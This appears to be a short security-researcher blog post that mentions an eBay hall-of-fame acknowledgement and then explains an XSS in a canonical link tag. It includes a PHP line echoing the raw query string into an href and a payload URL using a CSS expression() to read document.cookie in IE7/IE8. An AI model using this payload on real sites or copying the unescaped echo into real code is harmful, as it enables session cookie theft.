Ebay add me in its hall of fame after I reporting a clickjacking related issue for them
http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html
In one of our customer’s website, the injection point is in <link rel=’canonical’ href=”> tag and it looks like something like
<link rel=’cannoical’ href=’http://example.com/test.php?pid=<?php echo $_SERVER[‘QUERY_STRING’];>’>
The server will encode <, > and “, if you try http://example.com/test.php?pid=”<qss>, the response will be
<link rel="canonical" href='http://example.com/test.php?pid="<qss>' />
Under this case, using the following payload, you could exploit this XSS under IE7 and IE 8.
http://example.com/test.php?pid=’style=’x:expression(alert(document.cookie))’ t